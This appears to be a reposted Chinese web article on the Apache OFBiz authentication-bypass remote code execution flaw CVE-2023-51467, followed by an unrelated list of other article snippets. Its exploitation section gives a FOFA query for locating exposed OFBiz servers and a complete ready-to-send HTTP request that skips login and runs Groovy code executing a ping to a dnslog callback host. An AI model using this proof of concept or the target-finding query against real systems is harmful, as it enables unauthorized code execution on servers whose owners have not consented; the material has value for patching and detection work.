Apache OFBiz 远程代码执行漏洞(CVE-2023-51467)

产品简介

Apache OFBiz是一个电子商务平台,用于构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类应用系统。

漏洞概述

该系统的身份验证机制存在缺陷,可能允许未授权用户通过绕过标准登录流程来获取后台访问权限。此外,在处理特定数据输入时,攻击者可构造恶意请求绕过身份认证,利用后台相关接口功能执行groovy代码,导致远程代码执行

指纹识别

fofa:

(cert="Organizational Unit: Apache OFBiz" || (body="www.ofbiz.org" && body="/images/ofbiz_powered.gif") || header="Set-Cookie: OFBiz.Visitor" || banner="Set-Cookie: OFBiz.Visitor") && country="CN"

漏洞利用

poc:

POST /webtools/control/ProgramExport?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: you_ip
Cache-Control: max-age=0
Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120", "Google Chrome";v="120"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 175groovyProgram=import%20groovy.lang.GroovyShell%0A%0AGroovyShell%20shell%3Dnew%20GroovyShell%28%29%3B%0Ashell.evaluate%28%27%22ping%20r9ntby42.dnslog.pw%22.execute%28%29%27%29

ping dnslog
在这里插入图片描述

在这里插入图片描述

【身在井隅,心向璀璨】

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/584463.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Docker常用命令详细整合

超详细Docker整合笔记可看:尚硅谷Docker基础篇和Dockerfile超详细整合笔记-CSDN博客 ———————————————————————————— Docker常用命令: 帮助启动类命令: 启动docker: systemctl start docker 停止…

Visual Studio Code 中,通过显示波浪线来提示代码中存在的错误或警告

在Visual Studio Code (VSCode)中,编辑器会通过显示波浪线(也称为squiggles)来提示代码中存在的错误或警告。这些波浪线的颜色通常为红色表示错误,黄色表示警告。 1. 自定义错误和警告提示 • 打开设置:点击左上角菜单…

WebService

调试工具:Postman、SoapUI Soap WebService :.net WCF 、Java CFX WebService三要素: SOAP(Simple Object Access Protocol):用来描述传递信息的格式, 可以和现存的许多因特网协议和格式结合使用&#x…

使用bat来生成mp4文件转m4s文件格式

bat设置变量 echo off set /p a请输入mp4名称(最好是在assets/video文件下存储): echo %a%bat设置utf-8编码 Chcp 65001m4s保存保存 注意: 需要下载ffmpeg并保存在系统环境变量中方可执行 echo off#设置utf-8编码 chcp 65001set /p a请输入mp4名称(最好是在assets/video文件下…

了解英语中主语谓语宾语等等句子成分

目录 官方书面解释: 简介: 细分: 通俗易懂解释: 各个成分的解释: 扩展资料: 官方书面解释: 简介: 在句子中,词与词之间有一定的组合关系,按照不同的…

三分钟学完科研论文常用统计图

统计分析的结果通常包括统计图和统计表。统计图是一种用图形表示数据的方式,它能够直观地展示数据的分布、趋势和关系。科研论文中常见的统计图包括条形图、饼图、折线图、散点图等。这些图形可以帮助人们快速地理解和分析数据,找出其中的规律和特征。今…

赛宁综合安全验证评估,筑牢关基网络安全屏障

在国际复杂态势和数字经济发展的驱动下,关键信息基础设施(以下简称:关基)的安全运营逐步走向实战化、体系化和常态化。验证评估作为安全运营的试金石,已成为实现动态防御、主动防御的有力手段。如何通过体系化验证评估…

【WPF】 使用UserControl并在XAML中赋初始值

文章目录 一、前言二、使用步骤1. cs中设置控件属性2. 在引入控件时,Xaml传初始值 一、前言 在XAML中使用自定义控件,并在XAML中并赋初始值。 二、使用步骤 1. cs中设置控件属性 设置OriginLocation,ScaleInterval 属性,可以通…

刷脸消费进入机关单位、企业员工消费应用场景

随着人脸识别技术的应用越来越广泛,刷卡消费已逐步被刷脸消费所替代。目前在一些高等院校、机关单位甚至是企业开始投入使用人脸消费机。与传统的刷卡识别技术相比,人脸识别技术具有以下优势: 无需持卡,方便人员使用。避免卡片丢…

DS18B20温度检测及其液晶显示

#include<reg51.h> //包含单片机寄存器的头文件 #include<intrins.h> //包含_nop_()函数定义的头文件 unsigned char code digit[10]{"0123456789"}; //定义字符数组显示数字 unsigned char code Str[]{"Test by DS18B20"}; //说明…

DP进阶之路——01背包问题

题目链接&#xff1a;题目页面 小明是一位科学家&#xff0c;他需要参加一场重要的国际科学大会&#xff0c;以展示自己的最新研究成果。他需要带一些研究材料&#xff0c;但是他的行李箱空间有限。这些研究材料包括实验设备、文献资料和实验样本等等&#xff0c;它们各自占据不…

web自动化上传文件

1&#xff0c;web 自动化文件上传不要太简单 熟悉 web 自动化测试的大佬应该都懂&#xff0c;当采用 js 调用原生控件进行文件上传的时候&#xff0c;最常用的是使用 pywin32 等系统交互库。 当看到 pywin32 那丑陋的 api 封装只能爆粗口。就为了输入一个文件地址&#xff0c;…

Python多线程和线程池的下载实战用法

1.多线程和线程池用法区别 多线程和线程池都是Python中常用的并发编程方式&#xff0c;根据具体的需求和场景选择合适的方式。 多线程&#xff1a; 优点&#xff1a;直观、简单&#xff0c;适合简单的并发任务。可以使用 threading.Thread 类创建线程&#xff0c;每个线程独立…

频谱论文:基于空间稀疏采样的频谱态势生成: 模型与算法

#频谱# 张国勇,王军,陈霄南等.基于空间稀疏采样的频谱态势生成:模型与算法[J].中国科学:信息科学,2022,52(11):2011-2036. &#xff08;电子科技大学&#xff09; 摘要 面对日益复杂的电磁频谱环境和持续增长的用频需求, 为了维护电磁频谱秩序和安全, 提高频谱资源整体利用效率…

【Vue】Vue2的最后一舞

Vue 2.7 是 Vue 2.x 的最后一个次级版本。在此发布之后&#xff0c;Vue 2 将会进入长期技术支持 (LTS&#xff1a;long-term support) 状态&#xff0c;该状态从现在起计算会持续 18 个月&#xff0c;且不再提供新特性。 根据Vue官网的说法&#xff0c;随着Vue 2.7的发布&#…

《LeetCode力扣练习》代码随想录——栈与队列(逆波兰表达式求值---Java)

《LeetCode力扣练习》代码随想录——栈与队列&#xff08;逆波兰表达式求值—Java&#xff09; 刷题思路来源于 代码随想录 150. 逆波兰表达式求值 栈 class Solution {public int evalRPN(String[] tokens) {// Stack<Integer> stacknew Stack<>();Deque<Integ…

Vue - 事件处理详解

组件代码 下面是一个基本的 Vue.js 组件代码&#xff0c;其中包含了不同类型的事件处理器&#xff1a; <template><div><!-- 内联事件处理器&#xff1a;点击按钮时调用 increaseCount 方法 --><button click"increaseCount">加 1</but…

南大通用数据库 GBase 8a 性能调优方法--Hash索引

南大通用数据库--GBase 8a中建立Hash Index 通常可以用来解决等值查询的定位效率&#xff0c;特别是对以单表精确查询为主的应用场景尤为适合&#xff0c;如电信业务中的并发话单查询等&#xff08;特别是内存基本充足的场景&#xff09;。 默认创建GLOBAL的哈希索引。创建全局…

组合[中等]

一、题目 给定两个整数n和k&#xff0c;返回范围[1, n]中所有可能的k个数的组合。你可以按 任何顺序 返回答案。 示例 1&#xff1a; 输入&#xff1a;n 4, k 2 输出&#xff1a; [ [2,4], [3,4], [2,3], [1,2], [1,3], [1,4], ] 示例 2&#xff1a; 输入&#xff1a;n 1…

《对话品牌》——魅力女人:成就幸福人生

本期节目《对话品牌》栏目组邀请到了北京紫琪尔健康管理集团董事长紫琪尔孙红宇女士参加栏目录制&#xff0c;分享其企业故事&#xff0c;树立品牌形象&#xff0c;提升品牌价值&#xff01; 节目嘉宾&#xff1a;紫琪尔集团董事长孙红宇 节目主持人&#xff1a;吴昊 节目播…